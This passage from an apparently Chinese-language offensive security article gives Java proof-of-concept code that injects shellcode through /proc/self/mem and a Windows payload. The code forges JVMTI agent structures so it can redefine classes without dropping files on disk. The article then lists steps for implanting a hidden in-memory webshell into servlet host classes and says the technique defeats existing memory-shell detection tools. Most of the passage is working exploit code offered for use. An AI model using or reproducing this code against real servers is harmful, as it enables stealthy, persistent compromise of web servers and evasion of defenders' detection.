te)0x20,(byte)0x4C,(byte)0x89,(byte)0xF1,(byte)0x4D,(byte)0x8B,(byte)0x3E,(byte)0x4D,(byte)0x8B,(byte)0x7F,(byte)0x28,(byte)0x41,(byte)0xFF,(byte)0xD7,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x78,(byte)0xC3};
byte[] stub=new byte[]{0x48,0x47,0x46,0x45,0x44,0x43,0x42,0x41};
if (pointerLength==4) {
buf = new byte[]{(byte) 0x90, (byte) 0x90, (byte) 0x90, (byte) 0x33, (byte) 0xC9, (byte) 0x64, (byte) 0xA1, (byte) 0x30, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8B, (byte) 0x40, (byte) 0x0C, (byte) 0x8B, (byte) 0x70, (byte) 0x14, (byte) 0xAD, (byte) 0x96, (byte) 0xAD, (byte) 0x8B, (byte) 0x58, (byte) 0x10, (byte) 0x8B, (byte) 0x53, (byte) 0x3C, (byte) 0x03, (byte) 0xD3, (byte) 0x8B, (byte) 0x52, (byte) 0x78, (byte) 0x03, (byte) 0xD3, (byte) 0x33, (byte) 0xC9, (byte) 0x8B, (byte) 0x72, (byte) 0x20, (byte) 0x03, (byte) 0xF3, (byte) 0x41, (byte) 0xAD, (byte) 0x03, (byte) 0xC3, (byte) 0x81, (byte) 0x38, (byte) 0x47, (byte) 0x65, (byte) 0x74, (byte) 0x50, (byte) 0x75, (byte) 0xF4, (byte) 0x81, (byte) 0x78, (byte) 0x04, (byte) 0x72, (byte) 0x6F, (byte) 0x63, (byte) 0x41, (byte) 0x75, (byte) 0xEB, (byte) 0x81, (byte) 0x78, (byte) 0x08, (byte) 0x64, (byte) 0x64, (byte) 0x72, (byte) 0x65, (byte) 0x75, (byte) 0xE2, (byte) 0x8B, (byte) 0x72, (byte) 0x24, (byte) 0x03, (byte) 0xF3, (byte) 0x66, (byte) 0x8B, (byte) 0x0C, (byte) 0x4E, (byte) 0x49, (byte) 0x8B, (byte) 0x72, (byte) 0x1C, (byte) 0x03, (byte) 0xF3, (byte) 0x8B, (byte) 0x14, (byte) 0x8E, (byte) 0x03, (byte) 0xD3, (byte) 0x52, (byte) 0x33, (byte) 0xC9, (byte) 0x51, (byte) 0x68, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x41, (byte) 0x68, (byte) 0x4C, (byte) 0x69, (byte) 0x62, (byte) 0x72, (byte) 0x68, (byte) 0x4C, (byte) 0x6F, (byte) 0x61, (byte) 0x64, (byte) 0x54, (byte) 0x53, (byte) 0xFF, (byte) 0xD2, (byte) 0x83, (byte) 0xC4, (byte) 0x0C, (byte) 0x59, (byte) 0x50, (byte) 0x66, (byte) 0xB9, (byte) 0x33, (byte) 0x32, (byte) 0x51, (byte) 0x68, (byte) 0x6A, (byte) 0x76, (byte) 0x6D, (byte) 0x00, (byte) 0x54, (byte) 0xFF, (byte) 0xD0, (byte) 0x8B, (byte) 0xD8, (byte) 0x83, (byte) 0xC4, (byte) 0x0C, (byte) 0x5A, (byte) 0x33, (byte) 0xC9, (byte) 0x51, (byte) 0x6A, (byte) 0x73, (byte) 0x68, (byte) 0x76, (byte) 0x61, (byte) 0x56, (byte) 0x4D, (byte) 0x68, (byte) 0x65, (byte) 0x64, (byte) 0x4A, (byte) 0x61, (byte) 0x68, (byte) 0x72, (byte) 0x65, (byte) 0x61, (byte) 0x74, (byte) 0x68, (byte) 0x47, (byte) 0x65, (byte) 0x74, (byte) 0x43, (byte) 0x68, (byte) 0x4A, (byte) 0x4E, (byte) 0x49, (byte) 0x5F, (byte) 0x54, (byte) 0x53, (byte) 0xFF, (byte) 0xD2, (byte) 0x89, (byte) 0x45, (byte) 0xF0, (byte) 0x54, (byte) 0x6A, (byte) 0x01, (byte) 0x54, (byte) 0x59, (byte) 0x83, (byte) 0xC1, (byte) 0x10, (byte) 0x51, (byte) 0x54, (byte) 0x59, (byte) 0x6A, (byte) 0x01, (byte) 0x51, (byte) 0xFF, (byte) 0xD0, (byte) 0x8B, (byte) 0xC1, (byte) 0x83, (byte) 0xEC, (byte) 0x30, (byte) 0x6A, (byte) 0x00, (byte) 0x54, (byte) 0x59, (byte) 0x83, (byte) 0xC1, (byte) 0x10, (byte) 0x51, (byte) 0x8B, (byte) 0x00, (byte) 0x50, (byte) 0x8B, (byte) 0x18, (byte) 0x8B, (byte) 0x43, (byte) 0x10, (byte) 0xFF, (byte) 0xD0, (byte) 0x8B, (byte) 0x43, (byte) 0x18, (byte) 0x68, (byte) 0x00, (byte) 0x02, (byte) 0x01, (byte) 0x30, (byte) 0x68, (byte) 0x44, (byte) 0x43, (byte) 0x42, (byte) 0x41, (byte) 0x83, (byte) 0xEC, (byte) 0x04, (byte) 0xFF, (byte) 0xD0, (byte) 0x83, (byte) 0xEC, (byte) 0x0C, (byte) 0x8B, (byte) 0x43, (byte) 0x14, (byte) 0xFF, (byte) 0xD0, (byte) 0x83, (byte) 0xC4, (byte) 0x5C, (byte) 0xC3};
stub=new byte[]{0x44,0x43,0x42,0x41};
}
buf=replaceBytes(buf,stub,long2ByteArray_Little_Endian(JPLISAgent+pointerLength,pointerLength));
classBody[7]=0x32;
try {
System.loadLibrary("attach");
enqueue(-1, buf, "enqueue", "enqueue");
} catch (Exception e) {
e.printStackTrace();
return;
}
long native_jvmtienv=unsafe.getLong(JPLISAgent+pointerLength);
if (pointerLength==4)
{
unsafe.putByte(native_jvmtienv+201 , (byte) 2);
}
else
{
unsafe.putByte(native_jvmtienv+361 , (byte) 2);
}
try {
Class<?> instrument_clazz = Class.forName("sun.instrument.InstrumentationImpl");
Constructor<?> constructor = instrument_clazz.getDeclaredConstructor(long.class, boolean.class, boolean.class);
constructor.setAccessible(true);
Object inst = constructor.newInstance(JPLISAgent, true, false);
ClassDefinition definition = new ClassDefinition(Class.forName(className), classBody);
Method redefineClazz = instrument_clazz.getMethod("redefineClasses", ClassDefinition[].class);
redefineClazz.invoke(inst, new Object[] {
new ClassDefinition[] {
definition
}
});
}
catch (Throwable error)
{
error.printStackTrace();
throw error;
}
}
/**
* long 转字节数组,小端
*/
public static byte[] long2ByteArray_Little_Endian(long l,int length) {
byte[] array = new byte[length];
for (int i = 0; i < array.length; i++) {
array[i] = (byte) (l >> (i * 8));
}
return array;
}
private static byte[] replaceBytes(byte[] bytes,byte[] byteSource,byte[] byteTarget)
{
for(int i=0;i<bytes.length;i++)
{
boolean bl=true;//从当前下标开始的字节是否与欲替换字节相等;
for(int j=0;j<byteSource.length;j++)
{
if(i+j<bytes.length&&bytes[i+j]==byteSource[j])
{
}
else
{
bl=false;
}
}
if(bl)
{
System.arraycopy(byteTarget, 0, bytes, i, byteTarget.length);
}
}
return bytes;
}
}
上面Poc中有两个属性,className和classBody。如果想要动态修改某个类的字节码,只需要实例化WindowsVirtualMachine类,设置className和classBody为目标类名和新的字节码数组,然后调用work方法,即可完成类的热修改。
在Linux平台下,将上文的shellcode整合,利用代码如下:
/**
* @version 1.0
* @Author 游望之
* @注释
*/
import sun.misc.Unsafe;
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.lang.instrument.ClassDefinition;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
public class MemShell {
private void agentForLinux(String className,byte[] classBody) throws Exception {
FileReader fin = new FileReader("/proc/self/maps");
BufferedReader reader = new BufferedReader(fin);
String line;
long RandomAccessFile_length = 0, JNI_GetCreatedJavaVMs = 0;
while ((line = reader.readLine()) != null)
{
String[] splits = line.trim().split(" ");
if(line.endsWith("libjava.so") && RandomAccessFile_length == 0) {
String[] addr_range = splits[0].split("-");
long libbase = Long.parseLong(addr_range[0], 16);
String elfpath = splits[splits.length - 1];
RandomAccessFile_length = find_symbol(elfpath, "Java_java_io_RandomAccessFile_length", libbase);
}else if(line.endsWith("libjvm.so") && JNI_GetCreatedJavaVMs == 0) {
String[] addr_range = splits[0].split("-");
long libbase = Long.parseLong(addr_range[0], 16);
String elfpath = splits[splits.length - 1];
JNI_GetCreatedJavaVMs = find_symbol(elfpath, "JNI_GetCreatedJavaVMs", libbase);
}
if(JNI_GetCreatedJavaVMs != 0 && RandomAccessFile_length != 0)
break;
}
fin.close();
//修改Java_java_io_RandomAccessFile_open0的native代码,调用JNI_GetCreatedJavaVMs获取JavaVM,再通过JavaVM获取jvmtienv
RandomAccessFile fout = new RandomAccessFile("/proc/self/mem", "rw");
//RSP 16字节对齐
byte[] stack_align = {0x55, 0x48, (byte)0x89, (byte)0xe5, 0x48, (byte)0xc7, (byte)0xc0, 0xf, 0, 0, 0, 0x48, (byte)0xf7, (byte)0xd0};
byte[] movabs_rax = {0x48, (byte) 0xb8};
ByteBuffer buffer = ByteBuffer.allocate(Long.BYTES);
buffer.order(ByteOrder.LITTLE_ENDIAN);
buffer.putLong(0, JNI_GetCreatedJavaVMs);
byte[] b = {0x48, (byte) 0x83, (byte) 0xEC, 0x40, 0x48, 0x31, (byte) 0xF6, 0x48, (byte) 0xFF, (byte) 0xC6, 0x48, (byte) 0x8D, 0x54, 0x24, 0x04, 0x48,
(byte) 0x8D, 0x7C, 0x24, 0x08, (byte) 0xFF, (byte) 0xD0, 0x48, (byte) 0x8B, 0x7C, 0x24, 0x08, 0x48, (byte) 0x8D, 0x74, 0x24, 0x10,
(byte) 0xBA, 0x00, 0x02, 0x01, 0x30, 0x48, (byte) 0x8B, 0x07, (byte) 0xFF, 0x50, 0x30, 0x48, (byte) 0x8B, 0x44, 0x24, 0x10,
0x48, (byte) 0x83, (byte) 0xC4, 0x40, (byte)0xC9, (byte) 0xC3 };
int shellcode_len = b.length + 8 + movabs_rax.length + stack_align.length;
long landingpad = RandomAccessFile_length;
byte[] backup = new byte[shellcode_len];
fout.seek(landingpad);
fout.read(backup);
fout.seek(landingpad);
fout.write(stack_align);
fout.write(movabs_rax);
fout.write(buffer.array());
fout.write(b);
fout.close();
long native_jvmtienv = fout.length(); //触发执行
System.out.printf("native_jvmtienv %x\n", native_jvmtienv);
//恢复代码
fout = new RandomAccessFile("/proc/self/mem", "rw");
fout.seek(RandomAccessFile_length);
fout.write(backup);
fout.close();
Unsafe unsafe = null;
try {
Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe");
field.setAccessible(true);
unsafe = (sun.misc.Unsafe) field.get(null);
} catch (Exception e) {
throw new AssertionError(e);
}
//libjvm.so的jvmti_RedefineClasses函数会校验if ( (*((_BYTE *)jvmtienv + 361) & 2) != 0 )
unsafe.putByte(native_jvmtienv + 361, (byte) 2);
//伪造JPLISAgent结构时,只需要填mNormalEnvironment中的mJVMTIEnv即可,其他变量代码中实际没有使用
long JPLISAgent = unsafe.allocateMemory(0x1000);
unsafe.putLong(JPLISAgent + 8, native_jvmtienv);
//利用伪造的JPLISAgent结构实例化InstrumentationImpl
try {
Class<?> instrument_clazz = Class.forName("sun.instrument.InstrumentationImpl");
Constructor<?> constructor = instrument_clazz.getDeclaredConstructor(long.class, boolean.class, boolean.class);
constructor.setAccessible(true);
Object inst = constructor.newInstance(JPLISAgent, true, false);
ClassDefinition definition = new ClassDefinition(Class.forName(className), classBody);
Method redefineClazz = instrument_clazz.getMethod("redefineClasses", ClassDefinition[].class);
redefineClazz.invoke(inst, new Object[] {
new ClassDefinition[] {
definition
}
});
}catch(Exception e) {
e.printStackTrace();
}
fout.getFD();
}
private static final int SHT_DYNSYM = 11;
private static final int STT_FUNC =2;
private static final int STT_GNU_IFUNC =10;
private static int ELF_ST_TYPE(int x) {
return (x & 0xf);
}
static long find_symbol(String elfpath, String sym, long libbase) throws IOException {
long func_ptr = 0;
RandomAccessFile fin = new RandomAccessFile(elfpath, "r");
byte[] e_ident = new byte[16];
fin.read(e_ident);
short e_type = Short.reverseBytes(fin.readShort());
short e_machine = Short.reverseBytes(fin.readShort());
int e_version = Integer.reverseBytes(fin.readInt());
long e_entry = Long.reverseBytes(fin.readLong());
long e_phoff = Long.reverseBytes(fin.readLong());
long e_shoff = Long.reverseBytes(fin.readLong());
int e_flags = Integer.reverseBytes(fin.readInt());
short e_ehsize = Short.reverseBytes(fin.readShort());
short e_phentsize = Short.reverseBytes(fin.readShort());
short e_phnum = Short.reverseBytes(fin.readShort());
short e_shentsize = Short.reverseBytes(fin.readShort());
short e_shnum = Short.reverseBytes(fin.readShort());
short e_shstrndx = Short.reverseBytes(fin.readShort());
int sh_name = 0;
int sh_type = 0;
long sh_flags = 0;
long sh_addr = 0;
long sh_offset = 0;
long sh_size = 0;
int sh_link = 0;
int sh_info = 0;
long sh_addralign = 0;
long sh_entsize = 0;
for(int i = 0; i < e_shnum; ++i) {
fin.seek(e_shoff + i*64);
sh_name = Integer.reverseBytes(fin.readInt());
sh_type = Integer.reverseBytes(fin.readInt());
sh_flags = Long.reverseBytes(fin.readLong());
sh_addr = Long.reverseBytes(fin.readLong());
sh_offset = Long.reverseBytes(fin.readLong());
sh_size = Long.reverseBytes(fin.readLong());
sh_link = Integer.reverseBytes(fin.readInt());
sh_info = Integer.reverseBytes(fin.readInt());
sh_addralign = Long.reverseBytes(fin.readLong());
sh_entsize = Long.reverseBytes(fin.readLong());
if(sh_type == SHT_DYNSYM) {
break;
}
}
int symtab_shdr_sh_link = sh_link;
long symtab_shdr_sh_size = sh_size;
long symtab_shdr_sh_entsize = sh_entsize;
long symtab_shdr_sh_offset = sh_offset;
fin.seek(e_shoff + symtab_shdr_sh_link * e_shentsize);
sh_name = Integer.reverseBytes(fin.readInt());
sh_type = Integer.reverseBytes(fin.readInt());
sh_flags = Long.reverseBytes(fin.readLong());
sh_addr = Long.reverseBytes(fin.readLong());
sh_offset = Long.reverseBytes(fin.readLong());
sh_size = Long.reverseBytes(fin.readLong());
sh_link = Integer.reverseBytes(fin.readInt());
sh_info = Integer.reverseBytes(fin.readInt());
sh_addralign = Long.reverseBytes(fin.readLong());
sh_entsize = Long.reverseBytes(fin.readLong());
long symstr_shdr_sh_offset = sh_offset;
long cnt = symtab_shdr_sh_entsize > 0 ? symtab_shdr_sh_size/symtab_shdr_sh_entsize : 0;
for(long i = 0; i < cnt; ++i) {
fin.seek(symtab_shdr_sh_offset + symtab_shdr_sh_entsize*i);
int st_name = Integer.reverseBytes(fin.readInt());
byte st_info = fin.readByte();
byte st_other = fin.readByte();
short st_shndx = Short.reverseBytes(fin.readShort());
long st_value = Long.reverseBytes(fin.readLong());
long st_size = Long.reverseBytes(fin.readLong());
if(st_value == 0
|| st_name == 0
|| (ELF_ST_TYPE(st_info) != STT_FUNC && ELF_ST_TYPE(st_info) != STT_GNU_IFUNC))
{
continue;
}
fin.seek(symstr_shdr_sh_offset + st_name);
String name = "";
byte ch = 0;
while((ch = fin.readByte()) != 0)
{
name += (char)ch;
}
if(sym.equals(name))
{
func_ptr = libbase + st_value;
break;
}
}
fin.close();
return func_ptr;
}
}
上面代码是我在游望之的Poc上做了一些修改,如果需要对Linux平台下的Java类字节码进行动态替换,只要实例化上述MemShell类,调用agentForLinux函数即可。agentForLinux函数有两个参数,第一个为需要动态修改的类名,第二个为类的新版本字节码数组。
至此,我们就在无需目标磁盘落地文件的前提下,优雅而又安静的完成了动态修改Java类的能力。为了后续讨论方便,我将这种无需提供Agent.jar或者Agent.so来直接调用JVMTI接口的能力称作AgentNoFile。
有了动态修改类字节码的能力,注入内存马就没有障碍了,流程如下:
1. 首先选定需要植入的宿主类,比如weblogic/servlet/internal/ServletStubImpl.class,jakarta/servlet/http/HttpServlet.class,javax/servlet/http/HttpServlet.class。这三个类基本可以覆盖主流的Java web容器了。
2. 读取宿主类的字节码;
3. 往步骤2中的字节码中插入webshell字节码,这一步可以用asm或者Javaassit完成,当然也可以直接硬编码别人植入好的成品;
4. 调用上文中的动态修改类的函数,传递宿主类名和修改过的类字节码数组,植入完成。
上述就是利用AgentNoFile技术植入内存马的一般步骤,当然具体选哪个宿主类可以根据环境自定义,比如选一些比较冷门但是却必现在正常执行流程中的类,这样可以更具隐蔽性。
冰蝎v4.0已集成该能力。
通过Java AgentNoFile方式植入的内存马,整个过程中不会有文件在磁盘上落地,而且不会在JVM中新增类,甚至连方法也不会增加。它就像inline hook一样无色无味。在目前已有的基于反射机制的内存马查杀工具面前,它是隐形的。如果配合我文中介绍的Anti-Attch机制,基于Java Agent技术的内存马查杀工具也会直接被致盲。
另外,本文标题虽然是讲内存马的注入,实际是提供了一种打通Java到Native层的一个不受约束的通道。利用这个通道,其实能做的事情非常多。
1. 利用“进程注入”实现无文件复活 WebShell
2. Java内存攻击技术漫谈